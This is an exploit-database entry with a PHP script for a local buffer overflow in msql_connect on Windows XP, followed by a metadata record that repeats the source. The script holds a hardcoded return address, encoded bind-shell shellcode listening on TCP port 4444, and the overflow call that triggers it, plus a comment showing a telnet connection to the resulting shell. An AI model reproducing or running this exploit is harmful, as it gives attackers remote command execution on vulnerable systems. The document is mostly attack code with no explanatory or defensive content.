ID 1337DAY-ID-7716
Type zdt
Reporter Inphex
Modified 2007-08-08T00:00:00
Description
Exploit for unknown platform in category local exploits
=====================================================
PHP mSQL (msql_connect) Local Buffer Overflow Exploit
=====================================================
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
$ret = "\xA3\x3D\x92\x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x58\x4a\x4f\x89" .
"\x2f\x95\x91\xc0\xdd\x98\xd3\x3e\x29\xa1\x87\xe4\xfa\xa0" .
"\xc2\x6e\xa5\x6e\x0c\x9a\x3c\xe5\x02\x17\x4a\xa6\x06\xa6" .
"\xa7\x5b\x1b\x23\xbe\x37\x47\x2f\xa0\x04\xb6\x94\x46\x01" .
"\xfa\x1a\x0c\x55\xf1\xd1\x62\x49\xa4\x6d\xc2\x79\xe8\x19" .
"\x4d\x37\x1a\x36\x01\x38\xf4\xa0\xf1\xa0\x91\x1f\xc4\x44" .
"\x15\x13\x1a\xcb\x8d\x2c\x8a\x9b\xe6\x3e\xd7\x60\xa9\x3f" .
"\xfe\xc9\xc0\x25\x99\x74\x3f\xad\x64\x23\xaa\xac\x97\x1b" .
"\x42\x68\x6e\x6e\x3e\xdd\x8e\x46\x12\xb1\x23\x35\xc6\x76" .
"\x97\xfa\xbb\x87\xc7\x9a\x53\x69\xb4\x04\xf7\x00\xa5\x5d" .
"\x9f\xb6\x3c\x2d\xa7\xe0\xbf\x1b\x4d\x1f\x11\xf6\x6d\xcf" .
"\xf9\x5c\x3c\xde\x10\xcb\xc0\xc9\xb0\xa6\xc1\x26\x5e\xad" .
"\x77\x41\xd6\x7a\x77\x9b\xb9\xd0\xd3\x71\xc5\x08\x48\x11" .
"\xde\xd1\xa9\x9b\x77\xde\xe0\x09\x87\xf0\x6b\xd8\x13\x96" .
"\x1b\x7f\xb1\xdf\x39\x15\x19\x86\xe8\x26\x10\xdf\x81\xf2" .
"\xaa\xfd\x67\x3b\x5f\xab\x76\xf9\x8d\x55\xc4\xd2\x5e\x24" .
"\xb3\x12\xca\x9d\xef\x0b\x7e\x1f\x5c\xdd\x81\xaa\xe7\x1d" .
"\xab\x0f\xbf\xb3\x05\xfe\x6e\x5e\xa7\x51\xc0\xcb\xf6\xae" .
"\x32\x9b\x55\x89\xb6\x92\xf5\xd6\x6f\x40\x05\xd7\xa7\x6a" .
"\x29\xac\x9f\x68\x49\x76\x7b\x6e\x98\x24\x7b\x40\x4d\x38" .
"\x09\x65\xd1\xeb\xf1\xb0\x12\xdb\x0e\x3d\xed";
//
msql_connect(str_repeat('A',49422)."\xeb\x02".$ret."\x15B".$shellcode."");
?>
# 0day.today [2018-04-03] #
{"published": "2007-08-08T00:00:00", "id": "1337DAY-ID-7716", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category local exploits", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-03T15:30:25", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:PAYLOAD/WINDOWS/X64/METERPRETER/REVERSE_HTTPS", "MSF:EXPLOIT/UNIX/WEBAPP/WP_SYMPOSIUM_SHELL_UPLOAD", "MSF:EXPLOIT/UNIX/WEBAPP/WP_DOWNLOADMANAGER_UPLOAD", "MSF:AUXILIARY/SCANNER/HTTP/GITLAB_USER_ENUM", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_RESTORE", "MSF:EXPLOIT/MULTI/HTTP/MANAGEENGINE_AUTH_UPLOAD", "MSF:AUXILIARY/SCANNER/HTTP/BMC_TRACKIT_PASSWD_RESET", "MSF:PAYLOAD/CMD/UNIX/REVERSE_RUBY", "MSF:EXPLOIT/SOLARIS/LOCAL/XSCREENSAVER_LOG_PRIV_ESC"]}, {"type": "zdt", "idList": ["1337DAY-ID-23116", "1337DAY-ID-17031"]}, {"type": "kitploit", "idList": ["KITPLOIT:5167596251841349275"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7716", "SECURITYVULNS:DOC:938", "SECURITYVULNS:VULN:4397", "SECURITYVULNS:DOC:7716"]}], "modified": "2018-04-03T15:30:25", "rev": 2}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-03T15:30:25", "edition": 2, "title": "PHP mSQL (msql_connect) Local Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/7716", "modified": "2007-08-08T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/7716", "references": [], "reporter": "Inphex", "sourceData": "=====================================================\r\nPHP mSQL (msql_connect) Local Buffer Overflow Exploit\r\n=====================================================\r\n\r\n\r\n\r\n<?php\r\n/*\r\nInphex\r\n317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.\r\n\r\nGET /script.php HTTP/1.1\\n\r\n\r\ntelnet 192.168.2.32 4444\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n\r\nC:\\apache>\r\n*/\r\nif(!function_exists('msql_connect')) {\r\ndie('mSQL extension is not available');\r\n}\r\n\r\n$ret = \"\\xA3\\x3D\\x92\\x7C\"; #shell32.dll ->CALL EBP WindowsXP\r\n$shellcode=\r\n\"\\xbd\\xdb\\xc6\\x38\\x8f\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\x58\\x31\\xc9\" .\r\n\"\\xb1\\x51\\x83\\xc0\\x04\\x31\\x68\\x0e\\x03\\xb3\\xc8\\xda\\x7a\\xbf\" .\r\n\"\\xbf\\xf1\\xc8\\xd7\\xb9\\xf9\\x2c\\xd8\\x5a\\x8d\\xbf\\x02\\xbf\\x1a\" .\r\n\"\\x7a\\x76\\x34\\x60\\x80\\xfe\\x4b\\x76\\x01\\xb1\\x53\\x03\\x49\\x6d\" .\r\n\"\\x65\\xf8\\x3f\\xe6\\x51\\x75\\xbe\\x16\\xa8\\x49\\x58\\x4a\\x4f\\x89\" .\r\n\"\\x2f\\x95\\x91\\xc0\\xdd\\x98\\xd3\\x3e\\x29\\xa1\\x87\\xe4\\xfa\\xa0\" .\r\n\"\\xc2\\x6e\\xa5\\x6e\\x0c\\x9a\\x3c\\xe5\\x02\\x17\\x4a\\xa6\\x06\\xa6\" .\r\n\"\\xa7\\x5b\\x1b\\x23\\xbe\\x37\\x47\\x2f\\xa0\\x04\\xb6\\x94\\x46\\x01\" .\r\n\"\\xfa\\x1a\\x0c\\x55\\xf1\\xd1\\x62\\x49\\xa4\\x6d\\xc2\\x79\\xe8\\x19\" .\r\n\"\\x4d\\x37\\x1a\\x36\\x01\\x38\\xf4\\xa0\\xf1\\xa0\\x91\\x1f\\xc4\\x44\" .\r\n\"\\x15\\x13\\x1a\\xcb\\x8d\\x2c\\x8a\\x9b\\xe6\\x3e\\xd7\\x60\\xa9\\x3f\" .\r\n\"\\xfe\\xc9\\xc0\\x25\\x99\\x74\\x3f\\xad\\x64\\x23\\xaa\\xac\\x97\\x1b\" .\r\n\"\\x42\\x68\\x6e\\x6e\\x3e\\xdd\\x8e\\x46\\x12\\xb1\\x23\\x35\\xc6\\x76\" .\r\n\"\\x97\\xfa\\xbb\\x87\\xc7\\x9a\\x53\\x69\\xb4\\x04\\xf7\\x00\\xa5\\x5d\" .\r\n\"\\x9f\\xb6\\x3c\\x2d\\xa7\\xe0\\xbf\\x1b\\x4d\\x1f\\x11\\xf6\\x6d\\xcf\" .\r\n\"\\xf9\\x5c\\x3c\\xde\\x10\\xcb\\xc0\\xc9\\xb0\\xa6\\xc1\\x26\\x5e\\xad\" .\r\n\"\\x77\\x41\\xd6\\x7a\\x77\\x9b\\xb9\\xd0\\xd3\\x71\\xc5\\x08\\x48\\x11\" .\r\n\"\\xde\\xd1\\xa9\\x9b\\x77\\xde\\xe0\\x09\\x87\\xf0\\x6b\\xd8\\x13\\x96\" .\r\n\"\\x1b\\x7f\\xb1\\xdf\\x39\\x15\\x19\\x86\\xe8\\x26\\x10\\xdf\\x81\\xf2\" .\r\n\"\\xaa\\xfd\\x67\\x3b\\x5f\\xab\\x76\\xf9\\x8d\\x55\\xc4\\xd2\\x5e\\x24\" .\r\n\"\\xb3\\x12\\xca\\x9d\\xef\\x0b\\x7e\\x1f\\x5c\\xdd\\x81\\xaa\\xe7\\x1d\" .\r\n\"\\xab\\x0f\\xbf\\xb3\\x05\\xfe\\x6e\\x5e\\xa7\\x51\\xc0\\xcb\\xf6\\xae\" .\r\n\"\\x32\\x9b\\x55\\x89\\xb6\\x92\\xf5\\xd6\\x6f\\x40\\x05\\xd7\\xa7\\x6a\" .\r\n\"\\x29\\xac\\x9f\\x68\\x49\\x76\\x7b\\x6e\\x98\\x24\\x7b\\x40\\x4d\\x38\" .\r\n\"\\x09\\x65\\xd1\\xeb\\xf1\\xb0\\x12\\xdb\\x0e\\x3d\\xed\";\r\n//\r\nmsql_connect(str_repeat('A',49422).\"\\xeb\\x02\".$ret.\"\\x15B\".$shellcode.\"\");\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-03] #"}
{}
